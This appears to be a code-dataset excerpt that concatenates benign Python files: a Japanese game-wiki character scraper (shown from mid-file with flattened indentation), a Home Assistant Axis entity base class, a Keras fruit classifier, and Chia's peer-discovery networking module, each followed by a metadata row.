ret_effs.append(enum_str)
m = re.match(r".*毎ターン(.+)が(\d+)[%%]回復.*", text, re.UNICODE)
if m:
effs_str = m.group(1)
effs = parse_effs(effs_str)
up_val = int(m.group(2))
up_val /= 100
enum_str = gen_eff_str(effs, scope, up_val)
ret_effs.append(enum_str)
return ", ".join(ret_effs)
def parse_adj_buff(text):
ret_effs = []
m = re.match(r".*(敵単体|敵全体)の(.+)上昇効果を解除.*", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
effs_str = m.group(2)
effs = parse_effs(effs_str)
for e in effs:
enum_str = f"Effect({scope}, AdjBuff.clear_buff, 0, 0, {e})"
ret_effs.append(enum_str)
m = re.match(r".*(自分|味方全体)のステイタス上昇効果.*(\d+)ターン延長", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
turn_val = m.group(2)
enum_str = f"Effect({scope}, AdjBuff.extend_buff, {turn_val}, 0)"
ret_effs.append(enum_str)
m = re.match(r".*(敵単体|敵全体)のステイタス減少効果.*(\d+)ターン延長", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
turn_val = m.group(2)
enum_str = f"Effect({scope}, AdjBuff.extend_debuff, {turn_val}, 0)"
ret_effs.append(enum_str)
m = re.match(r".*(敵単体|敵全体)のステイタス上昇効果.*(\d+)ターン減少", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
turn_val = m.group(2)
enum_str = f"Effect({scope}, AdjBuff.shorten_buff, {turn_val}, 0)"
ret_effs.append(enum_str)
return ", ".join(ret_effs)
def gen_skill_str(text, is_special=False):
text = text.replace("\n", "")
text = text.replace("・", "")
print(text)
atk_str = ""
mp_str = ""
special_str = ""
is_fast_str = ""
if "すばやく" in text:
is_fast_str = "is_fast=True, "
if "攻撃。" in text:
# has attack
atk_str = parse_atk(text)
turn = parse_turns(text)
texts = []
texts_tmp = text.split("し、")
scope_guessing = None
for txt in texts_tmp:
if "味方全体" in txt:
scope_guessing = "味方全体"
elif "自分" in txt:
scope_guessing = "自分"
if "自分" not in txt and "味方全体" not in txt:
if scope_guessing:
txt = scope_guessing + txt
texts.extend(txt.split("さらに"))
buffs_eff = []
debuffs_eff = []
adj_buffs_eff = []
for t in texts:
b = parse_buff(t, turn)
d = parse_debuff(t, turn)
a = parse_adj_buff(t)
rhp = parse_recover_hp(t, turn)
rmp = parse_recover_mp(t, turn)
if b:
buffs_eff.append(b)
if rhp:
buffs_eff.append(rhp)
if rmp:
buffs_eff.append(rmp)
if d:
debuffs_eff.append(d)
if a:
adj_buffs_eff.append(a)
buffs_str = f"buffs=[{', '.join(buffs_eff)}],"
debuffs_str = f"debuffs=[{', '.join(debuffs_eff)}],"
adj_buffs_str = f"adj_buffs=[{', '.join(adj_buffs_eff)}],"
# print(buffs_str)
# print(debuffs_str)
if is_special:
special_str = "is_special=True,"
else:
m = re.match(r".+(MP:(\d+)).*", text, re.UNICODE)
if m:
mp = m.group(1)
mp_str = f"mp={mp},"
skill_dec_str = f"Skill({is_fast_str} {atk_str} {special_str} {mp_str} {buffs_str} {debuffs_str} {adj_buffs_str})"
return skill_dec_str
def gen_passive_skill_str(text):
b = parse_passive_buff(text)
print(text)
return b
def gen_counter_hp_str(text):
m = re.match(r".*】.*カウンター発生時.*通常攻撃.*(HP|HP)回復", text, re.UNICODE)
if m:
return "counter_hp=True,"
return ""
def gen_killer_str(text):
m = re.match(r".*】(\w+)の敵を攻撃.*(\d+)[%%]上昇.*", text, re.UNICODE)
if m:
killer = m.group(1)
if killer == "猛牛系":
return "killer=Killer.bull, "
elif killer == "巨人系":
return "killer=Killer.giant, "
elif killer == "魔獣系":
return "killer=Killer.beast, "
elif killer == "精霊系":
return "killer=Killer.fairy, "
elif killer == "植物系":
return "killer=Killer.plant, "
elif killer == "昆虫系":
return "killer=Killer.bug, "
elif killer == "堅鉱系":
return "killer=Killer.rock, "
elif killer == "蠕獣系":
return "killer=Killer.worm, "
elif killer == "竜系":
return "killer=Killer.dragon, "
elif killer == "水棲系":
return "killer=Killer.aquatic, "
elif killer == "妖鬼系":
return "killer=Killer.orge, "
elif killer == "幽魔系":
return "killer=Killer.undead, "
else:
raise ValueError
return ""
def parsing_chara(html_text):
parser = HtmlParser(html_text)
chara = Chara()
basics_table = parser.get_next_div()
for tr in basics_table.table.find_all('tr'):
col = tr.th.text
val = tr.td.text
if col == "名称":
chara.name = val
if col == "カテゴリ":
if val == "冒険者":
chara.job = "Adventurer"
elif val == "アシスト":
chara.job = "Assist"
limit_break_status_table = parser.get_next_div()
while "最大値" not in limit_break_status_table.text:
limit_break_status_table = parser.get_next_div()
#limit_break_status_table = parser.get_next_div()
for tr in limit_break_status_table.table.find_all('tr'):
if tr.td is None:
continue
col = tr.td
val = col.find_next_sibling()
print(col.text, val.text)
if col.text == "HP":
chara.hp = int(val.text)
if col.text == "MP":
chara.mp = int(val.text)
if col.text == "物攻":
chara.str = int(val.text.split("(")[0])
if col.text == "魔攻":
chara.mag = int(val.text.split("(")[0])
if col.text == "防御":
chara.end = int(val.text.split("(")[0])
if col.text == "器用":
chara.dex = int(val.text.split("(")[0])
if col.text == "敏捷":
chara.agi = int(val.text.split("(")[0])
all_skills = []
all_passive_skills = []
if chara.job == "Adventurer":
status_table_no_used = parser.get_next_div()
special_skill = parser.get_next_div()
special_skill_dec_str = gen_skill_str(special_skill.text, True)
skills = parser.get_next_div()
for s in skills.find_all("td"):
skill_str = gen_skill_str(s.text)
all_skills.append(skill_str)
if chara.job == "Adventurer":
all_skills.append(special_skill_dec_str)
concated_skills = ',\n '.join(all_skills)
chara.skills = f"skills=[{concated_skills}],"
if chara.job == "Adventurer":
passive_skills = parser.get_next_div()
for s in passive_skills.find_all("td"):
passive_skill_str = gen_passive_skill_str(s.text)
if passive_skill_str:
all_passive_skills.append(passive_skill_str)
if chara.killer == "":
chara.killer = gen_killer_str(s.text)
if chara.counter_hp == "":
chara.counter_hp = gen_counter_hp_str(s.text)
concated_passive_skills = ',\n '.join(all_passive_skills)
chara.passive_skills = f"passive_skills=[Skill(buffs=[{concated_passive_skills}])],"
template = jinja2.Template("""
{{chara.job}}("{{chara.name}}", {{chara.hp}}, {{chara.mp}},
{{chara.str}}, {{chara.end}}, {{chara.dex}}, {{chara.agi}}, {{chara.mag}},
{{chara.skills}}
{{chara.passive_skills}}
{{chara.killer}}
{{chara.counter_hp}}
),
""")
if chara.job == "Adventurer":
out = template.render(chara=chara)
print(out)
else:
for i, s in enumerate(all_skills):
print("======================================================")
if i == 0:
continue
elif i == 1:
print("LV 60~76:")
elif i == 2:
print("LV 80:")
else:
                raise ValueError(f"unexpected assist skill index {i}")
chara.skills = f"skill={s}"
out = template.render(chara=chara)
print(out)
def parsing_chara_from_web(http_url):
r = requests.get(http_url)
html_text = r.text
parsing_chara(html_text)
if __name__ == '__main__':
with open('tmp.html', 'r', encoding="utf-8") as f:
html_text_to_test = f.read()
parsing_chara(html_text_to_test)
| gen_chara.py | 18,267 | has attack print(buffs_str) print(debuffs_str)limit_break_status_table = parser.get_next_div() | 94 | en | 0.259444 |
"""Base classes for Axis entities."""
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import DOMAIN as AXIS_DOMAIN
class AxisEntityBase(Entity):
"""Base common to all Axis entities."""
def __init__(self, device):
"""Initialize the Axis event."""
self.device = device
self._attr_device_info = DeviceInfo(
identifiers={(AXIS_DOMAIN, device.unique_id)}
)
async def async_added_to_hass(self):
"""Subscribe device events."""
self.async_on_remove(
async_dispatcher_connect(
self.hass, self.device.signal_reachable, self.update_callback
)
)
@property
def available(self):
"""Return True if device is available."""
return self.device.available
@callback
def update_callback(self, no_delay=None):
"""Update the entities state."""
self.async_write_ha_state()
class AxisEventBase(AxisEntityBase):
"""Base common to all Axis entities from event stream."""
_attr_should_poll = False
def __init__(self, event, device):
"""Initialize the Axis event."""
super().__init__(device)
self.event = event
self._attr_name = f"{device.name} {event.TYPE} {event.id}"
self._attr_unique_id = f"{device.unique_id}-{event.topic}-{event.id}"
self._attr_device_class = event.CLASS
async def async_added_to_hass(self) -> None:
"""Subscribe sensors events."""
self.event.register_callback(self.update_callback)
await super().async_added_to_hass()
async def async_will_remove_from_hass(self) -> None:
"""Disconnect device object when removed."""
self.event.remove_callback(self.update_callback)
| homeassistant/components/axis/axis_base.py | 1,887 | Base common to all Axis entities. Base common to all Axis entities from event stream. Initialize the Axis event. Initialize the Axis event. Return True if device is available. Update the entities state. Base classes for Axis entities. | 234 | en | 0.861874 |
'''
This module has all relevant functions to make predictions using a previously
trained model.
'''
import os
import numpy as np
import tensorflow.keras as keras
from tensorflow.keras.preprocessing import image
from tensorflow.keras.models import load_model
import cv2
model = load_model('../models/app_ban_ora_selftrained')
def decode_prediction(prediction):
'''
Decodes predictions and returns a result string.
'''
if np.where(prediction == np.amax(prediction))[1] == 2:
prob_orange = round(prediction[0][2] * 100, 2)
label = f"I am {prob_orange} % sure this is an orange \N{tangerine}!"
if np.where(prediction == np.amax(prediction))[1] == 1:
prob_banana = round(prediction[0][1] * 100, 2)
label = f"I am {prob_banana} % sure this is a banana \N{banana}!"
if np.where(prediction == np.amax(prediction))[1] == 0:
prob_apple = round(prediction[0][0] * 100, 2)
label = f"I am {prob_apple} % sure this is an apple \N{red apple}!"
return label
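# Illustrative example (not part of the original module): the class order is
# apple (index 0), banana (index 1), orange (index 2), so
#   decode_prediction(np.array([[0.1, 0.7, 0.2]]))
# returns "I am 70.0 % sure this is a banana 🍌!".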
def predict(frame):
'''
    Takes a frame as input, makes a prediction, decodes it
and returns a result string.
'''
img = cv2.resize(frame, (224, 224))
img = cv2.cvtColor(np.float32(img), cv2.COLOR_BGR2RGB)
img = img.reshape(1, 224, 224, 3)
prediction = model.predict(img)
label = decode_prediction(prediction)
return label
| src/predict.py | 1,384 | Decodes predictions and returns a result string. Takes a frame as input, makes a prediction, decodes it and returns a result string. This module has all relevant functions to make predictions using a previously trained model. | 226 | en | 0.850624 |
import asyncio
import math
import time
import traceback
from pathlib import Path
from random import Random
from secrets import randbits
from typing import Dict, Optional, List, Set
import aiosqlite
import chia.server.ws_connection as ws
import dns.asyncresolver
from chia.protocols import full_node_protocol, introducer_protocol
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.address_manager import AddressManager, ExtendedPeerInfo
from chia.server.address_manager_store import AddressManagerStore
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ChiaServer
from chia.types.peer_info import PeerInfo, TimestampedPeerInfo
from chia.util.hash import std_hash
from chia.util.ints import uint64
from chia.util.path import mkdir, path_from_root
MAX_PEERS_RECEIVED_PER_REQUEST = 1000
MAX_TOTAL_PEERS_RECEIVED = 3000
MAX_CONCURRENT_OUTBOUND_CONNECTIONS = 70
NETWORK_ID_DEFAULT_PORTS = {
"mainnet": 8444,
"testnet7": 58444,
"testnet8": 58445,
}
class FullNodeDiscovery:
resolver: Optional[dns.asyncresolver.Resolver]
def __init__(
self,
server: ChiaServer,
root_path: Path,
target_outbound_count: int,
peer_db_path: str,
introducer_info: Optional[Dict],
dns_servers: List[str],
peer_connect_interval: int,
selected_network: str,
default_port: Optional[int],
log,
):
self.server: ChiaServer = server
self.message_queue: asyncio.Queue = asyncio.Queue()
self.is_closed = False
self.target_outbound_count = target_outbound_count
# This is a double check to make sure testnet and mainnet peer databases never mix up.
# If the network is not 'mainnet', it names the peer db differently, including the selected_network.
if selected_network != "mainnet":
if not peer_db_path.endswith(".sqlite"):
raise ValueError(f"Invalid path for peer table db: {peer_db_path}. Make the path end with .sqlite")
peer_db_path = peer_db_path[:-7] + "_" + selected_network + ".sqlite"
self.peer_db_path = path_from_root(root_path, peer_db_path)
self.dns_servers = dns_servers
if introducer_info is not None:
self.introducer_info: Optional[PeerInfo] = PeerInfo(
introducer_info["host"],
introducer_info["port"],
)
else:
self.introducer_info = None
self.peer_connect_interval = peer_connect_interval
self.log = log
self.relay_queue = None
self.address_manager: Optional[AddressManager] = None
self.connection_time_pretest: Dict = {}
self.received_count_from_peers: Dict = {}
self.lock = asyncio.Lock()
self.connect_peers_task: Optional[asyncio.Task] = None
self.serialize_task: Optional[asyncio.Task] = None
self.cleanup_task: Optional[asyncio.Task] = None
self.initial_wait: int = 0
try:
self.resolver: Optional[dns.asyncresolver.Resolver] = dns.asyncresolver.Resolver()
except Exception:
self.resolver = None
self.log.exception("Error initializing asyncresolver")
self.pending_outbound_connections: Set[str] = set()
self.pending_tasks: Set[asyncio.Task] = set()
self.default_port: Optional[int] = default_port
if default_port is None and selected_network in NETWORK_ID_DEFAULT_PORTS:
self.default_port = NETWORK_ID_DEFAULT_PORTS[selected_network]
async def initialize_address_manager(self) -> None:
mkdir(self.peer_db_path.parent)
self.connection = await aiosqlite.connect(self.peer_db_path)
await self.connection.execute("pragma journal_mode=wal")
await self.connection.execute("pragma synchronous=OFF")
self.address_manager_store = await AddressManagerStore.create(self.connection)
if not await self.address_manager_store.is_empty():
self.address_manager = await self.address_manager_store.deserialize()
else:
await self.address_manager_store.clear()
self.address_manager = AddressManager()
self.server.set_received_message_callback(self.update_peer_timestamp_on_message)
async def start_tasks(self) -> None:
random = Random()
self.connect_peers_task = asyncio.create_task(self._connect_to_peers(random))
self.serialize_task = asyncio.create_task(self._periodically_serialize(random))
self.cleanup_task = asyncio.create_task(self._periodically_cleanup())
async def _close_common(self) -> None:
self.is_closed = True
self.cancel_task_safe(self.connect_peers_task)
self.cancel_task_safe(self.serialize_task)
self.cancel_task_safe(self.cleanup_task)
for t in self.pending_tasks:
self.cancel_task_safe(t)
if len(self.pending_tasks) > 0:
await asyncio.wait(self.pending_tasks)
await self.connection.close()
def cancel_task_safe(self, task: Optional[asyncio.Task]):
if task is not None:
try:
task.cancel()
except Exception as e:
self.log.error(f"Error while canceling task.{e} {task}")
def add_message(self, message, data):
self.message_queue.put_nowait((message, data))
async def on_connect(self, peer: ws.WSChiaConnection):
if (
peer.is_outbound is False
and peer.peer_server_port is not None
and peer.connection_type is NodeType.FULL_NODE
and self.server._local_type is NodeType.FULL_NODE
and self.address_manager is not None
):
timestamped_peer_info = TimestampedPeerInfo(
peer.peer_host,
peer.peer_server_port,
uint64(int(time.time())),
)
await self.address_manager.add_to_new_table([timestamped_peer_info], peer.get_peer_info(), 0)
if self.relay_queue is not None:
self.relay_queue.put_nowait((timestamped_peer_info, 1))
if (
peer.is_outbound
and peer.peer_server_port is not None
and peer.connection_type is NodeType.FULL_NODE
and (self.server._local_type is NodeType.FULL_NODE or self.server._local_type is NodeType.WALLET)
and self.address_manager is not None
):
msg = make_msg(ProtocolMessageTypes.request_peers, full_node_protocol.RequestPeers())
await peer.send_message(msg)
# Updates timestamps each time we receive a message for outbound connections.
async def update_peer_timestamp_on_message(self, peer: ws.WSChiaConnection):
if (
peer.is_outbound
and peer.peer_server_port is not None
and peer.connection_type is NodeType.FULL_NODE
and self.server._local_type is NodeType.FULL_NODE
and self.address_manager is not None
):
peer_info = peer.get_peer_info()
if peer_info is None:
return None
if peer_info.host not in self.connection_time_pretest:
self.connection_time_pretest[peer_info.host] = time.time()
if time.time() - self.connection_time_pretest[peer_info.host] > 600:
self.connection_time_pretest[peer_info.host] = time.time()
await self.address_manager.connect(peer_info)
def _num_needed_peers(self) -> int:
target = self.target_outbound_count
outgoing = len(self.server.get_full_node_outgoing_connections())
return max(0, target - outgoing)
"""
Uses the Poisson distribution to determine the next time
when we'll initiate a feeler connection.
(https://en.wikipedia.org/wiki/Poisson_distribution)
"""
def _poisson_next_send(self, now, avg_interval_seconds, random):
return now + (
math.log(random.randrange(1 << 48) * -0.0000000000000035527136788 + 1) * avg_interval_seconds * -1000000.0
+ 0.5
)
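    # Note on the expression above (explanatory, not from the original source):
    # randrange(1 << 48) * -3.5527136788e-15 + 1 maps a uniform integer in
    # [0, 2**48) to a uniform value in (0, 1], so log(...) is <= 0 and the whole
    # term becomes a positive, exponentially distributed delay in microseconds
    # with mean avg_interval_seconds (the caller passes `now` in microseconds).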
async def _introducer_client(self):
if self.introducer_info is None:
return None
async def on_connect(peer: ws.WSChiaConnection):
msg = make_msg(ProtocolMessageTypes.request_peers_introducer, introducer_protocol.RequestPeersIntroducer())
await peer.send_message(msg)
await self.server.start_client(self.introducer_info, on_connect)
async def _query_dns(self, dns_address):
try:
if self.default_port is None:
self.log.error(
"Network id not supported in NETWORK_ID_DEFAULT_PORTS neither in config. Skipping DNS query."
)
return
if self.resolver is None:
self.log.warn("Skipping DNS query: asyncresolver not initialized.")
return
for rdtype in ["A", "AAAA"]:
peers: List[TimestampedPeerInfo] = []
result = await self.resolver.resolve(qname=dns_address, rdtype=rdtype, lifetime=30)
for ip in result:
peers.append(
TimestampedPeerInfo(
ip.to_text(),
self.default_port,
0,
)
)
self.log.info(f"Received {len(peers)} peers from DNS seeder, using rdtype = {rdtype}.")
if len(peers) > 0:
await self._respond_peers_common(full_node_protocol.RespondPeers(peers), None, False)
except Exception as e:
self.log.warn(f"querying DNS introducer failed: {e}")
async def start_client_async(self, addr: PeerInfo, is_feeler: bool) -> None:
try:
if self.address_manager is None:
return
self.pending_outbound_connections.add(addr.host)
client_connected = await self.server.start_client(
addr,
on_connect=self.server.on_connect,
is_feeler=is_feeler,
)
if self.server.is_duplicate_or_self_connection(addr):
# Mark it as a softer attempt, without counting the failures.
await self.address_manager.attempt(addr, False)
else:
if client_connected is True:
await self.address_manager.mark_good(addr)
await self.address_manager.connect(addr)
else:
await self.address_manager.attempt(addr, True)
self.pending_outbound_connections.remove(addr.host)
except Exception as e:
if addr.host in self.pending_outbound_connections:
self.pending_outbound_connections.remove(addr.host)
self.log.error(f"Exception in create outbound connections: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
async def _connect_to_peers(self, random) -> None:
next_feeler = self._poisson_next_send(time.time() * 1000 * 1000, 240, random)
retry_introducers = False
introducer_attempts: int = 0
dns_server_index: int = 0
local_peerinfo: Optional[PeerInfo] = await self.server.get_peer_info()
last_timestamp_local_info: uint64 = uint64(int(time.time()))
last_collision_timestamp = 0
if self.initial_wait > 0:
await asyncio.sleep(self.initial_wait)
introducer_backoff = 1
while not self.is_closed:
try:
assert self.address_manager is not None
# We don't know any address, connect to the introducer to get some.
size = await self.address_manager.size()
if size == 0 or retry_introducers:
try:
await asyncio.sleep(introducer_backoff)
except asyncio.CancelledError:
return None
                    # Alternate between DNS servers and introducers: one query goes
                    # to a DNS server, the next two go to the introducer.
if introducer_attempts % 3 == 0 and len(self.dns_servers) > 0:
dns_address = self.dns_servers[dns_server_index]
dns_server_index = (dns_server_index + 1) % len(self.dns_servers)
await self._query_dns(dns_address)
else:
await self._introducer_client()
                    # There is some delay between receiving peers from the introducer
                    # and incorporating them, which could otherwise make this loop run
                    # one more time. Add this delay to ensure that once we get peers,
                    # we stop contacting the introducer.
try:
await asyncio.sleep(5)
except asyncio.CancelledError:
return None
retry_introducers = False
introducer_attempts += 1
# keep doubling the introducer delay until we reach 5
# minutes
if introducer_backoff < 300:
introducer_backoff *= 2
continue
else:
introducer_backoff = 1
# Only connect out to one peer per network group (/16 for IPv4).
groups = set()
full_node_connected = self.server.get_full_node_outgoing_connections()
connected = [c.get_peer_info() for c in full_node_connected]
connected = [c for c in connected if c is not None]
for conn in full_node_connected:
peer = conn.get_peer_info()
if peer is None:
continue
group = peer.get_group()
groups.add(group)
# Feeler Connections
#
# Design goals:
# * Increase the number of connectable addresses in the tried table.
#
# Method:
# * Choose a random address from new and attempt to connect to it if we can connect
# successfully it is added to tried.
# * Start attempting feeler connections only after node finishes making outbound
# connections.
# * Only make a feeler connection once every few minutes.
is_feeler = False
has_collision = False
if self._num_needed_peers() == 0:
if time.time() * 1000 * 1000 > next_feeler:
next_feeler = self._poisson_next_send(time.time() * 1000 * 1000, 240, random)
is_feeler = True
await self.address_manager.resolve_tried_collisions()
tries = 0
now = time.time()
got_peer = False
addr: Optional[PeerInfo] = None
max_tries = 50
if len(groups) < 3:
max_tries = 10
elif len(groups) <= 5:
max_tries = 25
select_peer_interval = max(0.1, len(groups) * 0.25)
while not got_peer and not self.is_closed:
self.log.debug(f"Address manager query count: {tries}. Query limit: {max_tries}")
try:
await asyncio.sleep(select_peer_interval)
except asyncio.CancelledError:
return None
tries += 1
if tries > max_tries:
addr = None
retry_introducers = True
break
info: Optional[ExtendedPeerInfo] = await self.address_manager.select_tried_collision()
if info is None or time.time() - last_collision_timestamp <= 60:
info = await self.address_manager.select_peer(is_feeler)
else:
has_collision = True
last_collision_timestamp = int(time.time())
if info is None:
if not is_feeler:
retry_introducers = True
break
# Require outbound connections, other than feelers,
# to be to distinct network groups.
addr = info.peer_info
if has_collision:
break
if addr is not None and not addr.is_valid():
addr = None
continue
if not is_feeler and addr.get_group() in groups:
addr = None
continue
if addr in connected:
addr = None
continue
# attempt a node once per 30 minutes.
if now - info.last_try < 1800:
continue
if time.time() - last_timestamp_local_info > 1800 or local_peerinfo is None:
local_peerinfo = await self.server.get_peer_info()
last_timestamp_local_info = uint64(int(time.time()))
if local_peerinfo is not None and addr == local_peerinfo:
continue
got_peer = True
self.log.debug(f"Addrman selected address: {addr}.")
disconnect_after_handshake = is_feeler
extra_peers_needed = self._num_needed_peers()
if extra_peers_needed == 0:
disconnect_after_handshake = True
retry_introducers = False
self.log.debug(f"Num peers needed: {extra_peers_needed}")
initiate_connection = extra_peers_needed > 0 or has_collision or is_feeler
connect_peer_interval = max(0.25, len(groups) * 0.5)
if not initiate_connection:
connect_peer_interval += 15
connect_peer_interval = min(connect_peer_interval, self.peer_connect_interval)
if addr is not None and initiate_connection and addr.host not in self.pending_outbound_connections:
if len(self.pending_outbound_connections) >= MAX_CONCURRENT_OUTBOUND_CONNECTIONS:
self.log.debug("Max concurrent outbound connections reached. waiting")
await asyncio.wait(self.pending_tasks, return_when=asyncio.FIRST_COMPLETED)
self.pending_tasks.add(
asyncio.create_task(self.start_client_async(addr, disconnect_after_handshake))
)
await asyncio.sleep(connect_peer_interval)
# prune completed connect tasks
                self.pending_tasks = set(filter(lambda t: not t.done(), self.pending_tasks))
except Exception as e:
self.log.error(f"Exception in create outbound connections: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
async def _periodically_serialize(self, random: Random):
while not self.is_closed:
if self.address_manager is None:
await asyncio.sleep(10)
continue
serialize_interval = random.randint(15 * 60, 30 * 60)
await asyncio.sleep(serialize_interval)
async with self.address_manager.lock:
await self.address_manager_store.serialize(self.address_manager)
async def _periodically_cleanup(self) -> None:
while not self.is_closed:
# Removes entries with timestamp worse than 14 days ago
# and with a high number of failed attempts.
# Most likely, the peer left the network,
# so we can save space in the peer tables.
cleanup_interval = 1800
max_timestamp_difference = 14 * 3600 * 24
max_consecutive_failures = 10
await asyncio.sleep(cleanup_interval)
# Perform the cleanup only if we have at least 3 connections.
full_node_connected = self.server.get_full_node_connections()
connected = [c.get_peer_info() for c in full_node_connected]
connected = [c for c in connected if c is not None]
if self.address_manager is not None and len(connected) >= 3:
async with self.address_manager.lock:
self.address_manager.cleanup(max_timestamp_difference, max_consecutive_failures)
async def _respond_peers_common(self, request, peer_src, is_full_node) -> None:
# Check if we got the peers from a full node or from the introducer.
peers_adjusted_timestamp = []
is_misbehaving = False
if len(request.peer_list) > MAX_PEERS_RECEIVED_PER_REQUEST:
is_misbehaving = True
if is_full_node:
if peer_src is None:
return None
async with self.lock:
if peer_src.host not in self.received_count_from_peers:
self.received_count_from_peers[peer_src.host] = 0
self.received_count_from_peers[peer_src.host] += len(request.peer_list)
if self.received_count_from_peers[peer_src.host] > MAX_TOTAL_PEERS_RECEIVED:
is_misbehaving = True
if is_misbehaving:
return None
for peer in request.peer_list:
if peer.timestamp < 100000000 or peer.timestamp > time.time() + 10 * 60:
# Invalid timestamp, predefine a bad one.
current_peer = TimestampedPeerInfo(
peer.host,
peer.port,
uint64(int(time.time() - 5 * 24 * 60 * 60)),
)
else:
current_peer = peer
if not is_full_node:
current_peer = TimestampedPeerInfo(
peer.host,
peer.port,
uint64(0),
)
peers_adjusted_timestamp.append(current_peer)
assert self.address_manager is not None
if is_full_node:
await self.address_manager.add_to_new_table(peers_adjusted_timestamp, peer_src, 2 * 60 * 60)
else:
await self.address_manager.add_to_new_table(peers_adjusted_timestamp, None, 0)
class FullNodePeers(FullNodeDiscovery):
self_advertise_task: Optional[asyncio.Task] = None
address_relay_task: Optional[asyncio.Task] = None
def __init__(
self,
server,
root_path,
max_inbound_count,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
):
super().__init__(
server,
root_path,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
)
self.relay_queue = asyncio.Queue()
self.neighbour_known_peers = {}
self.key = randbits(256)
async def start(self):
await self.initialize_address_manager()
self.self_advertise_task = asyncio.create_task(self._periodically_self_advertise_and_clean_data())
self.address_relay_task = asyncio.create_task(self._address_relay())
await self.start_tasks()
async def close(self):
await self._close_common()
self.cancel_task_safe(self.self_advertise_task)
self.cancel_task_safe(self.address_relay_task)
async def _periodically_self_advertise_and_clean_data(self):
while not self.is_closed:
try:
try:
await asyncio.sleep(24 * 3600)
except asyncio.CancelledError:
return None
# Clean up known nodes for neighbours every 24 hours.
async with self.lock:
for neighbour in list(self.neighbour_known_peers.keys()):
self.neighbour_known_peers[neighbour].clear()
# Self advertise every 24 hours.
peer = await self.server.get_peer_info()
if peer is None:
continue
timestamped_peer = [
TimestampedPeerInfo(
peer.host,
peer.port,
uint64(int(time.time())),
)
]
msg = make_msg(
ProtocolMessageTypes.respond_peers,
full_node_protocol.RespondPeers(timestamped_peer),
)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
async with self.lock:
for host in list(self.received_count_from_peers.keys()):
self.received_count_from_peers[host] = 0
except Exception as e:
self.log.error(f"Exception in self advertise: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
async def add_peers_neighbour(self, peers, neighbour_info):
neighbour_data = (neighbour_info.host, neighbour_info.port)
async with self.lock:
for peer in peers:
if neighbour_data not in self.neighbour_known_peers:
self.neighbour_known_peers[neighbour_data] = set()
if peer.host not in self.neighbour_known_peers[neighbour_data]:
self.neighbour_known_peers[neighbour_data].add(peer.host)
async def request_peers(self, peer_info: PeerInfo):
try:
# Prevent a fingerprint attack: do not send peers to inbound connections.
# This asymmetric behavior for inbound and outbound connections was introduced
# to prevent a fingerprinting attack: an attacker can send specific fake addresses
# to users' AddrMan and later request them by sending getaddr messages.
# Making nodes which are behind NAT and can only make outgoing connections ignore
# the request_peers message mitigates the attack.
if self.address_manager is None:
return None
peers = await self.address_manager.get_peers()
await self.add_peers_neighbour(peers, peer_info)
msg = make_msg(
ProtocolMessageTypes.respond_peers,
full_node_protocol.RespondPeers(peers),
)
return msg
except Exception as e:
self.log.error(f"Request peers exception: {e}")
async def respond_peers(self, request, peer_src, is_full_node):
try:
await self._respond_peers_common(request, peer_src, is_full_node)
if is_full_node:
await self.add_peers_neighbour(request.peer_list, peer_src)
if len(request.peer_list) == 1 and self.relay_queue is not None:
peer = request.peer_list[0]
if peer.timestamp > time.time() - 60 * 10:
self.relay_queue.put_nowait((peer, 2))
except Exception as e:
self.log.error(f"Respond peers exception: {e}. Traceback: {traceback.format_exc()}")
async def _address_relay(self):
while not self.is_closed:
try:
try:
relay_peer, num_peers = await self.relay_queue.get()
except asyncio.CancelledError:
return None
relay_peer_info = PeerInfo(relay_peer.host, relay_peer.port)
if not relay_peer_info.is_valid():
continue
# https://en.bitcoin.it/wiki/Satoshi_Client_Node_Discovery#Address_Relay
connections = self.server.get_full_node_connections()
hashes = []
cur_day = int(time.time()) // (24 * 60 * 60)
for connection in connections:
peer_info = connection.get_peer_info()
if peer_info is None:
continue
cur_hash = int.from_bytes(
bytes(
std_hash(
self.key.to_bytes(32, byteorder="big")
+ peer_info.get_key()
+ cur_day.to_bytes(3, byteorder="big")
)
),
byteorder="big",
)
hashes.append((cur_hash, connection))
hashes.sort(key=lambda x: x[0])
for index, (_, connection) in enumerate(hashes):
if index >= num_peers:
break
peer_info = connection.get_peer_info()
pair = (peer_info.host, peer_info.port)
async with self.lock:
if pair in self.neighbour_known_peers and relay_peer.host in self.neighbour_known_peers[pair]:
continue
if pair not in self.neighbour_known_peers:
self.neighbour_known_peers[pair] = set()
self.neighbour_known_peers[pair].add(relay_peer.host)
if connection.peer_node_id is None:
continue
msg = make_msg(
ProtocolMessageTypes.respond_peers,
full_node_protocol.RespondPeers([relay_peer]),
)
await connection.send_message(msg)
except Exception as e:
self.log.error(f"Exception in address relay: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
class WalletPeers(FullNodeDiscovery):
def __init__(
self,
server,
root_path,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
) -> None:
super().__init__(
server,
root_path,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
)
async def start(self) -> None:
self.initial_wait = 60
await self.initialize_address_manager()
await self.start_tasks()
async def ensure_is_closed(self) -> None:
if self.is_closed:
return None
await self._close_common()
async def respond_peers(self, request, peer_src, is_full_node) -> None:
await self._respond_peers_common(request, peer_src, is_full_node)
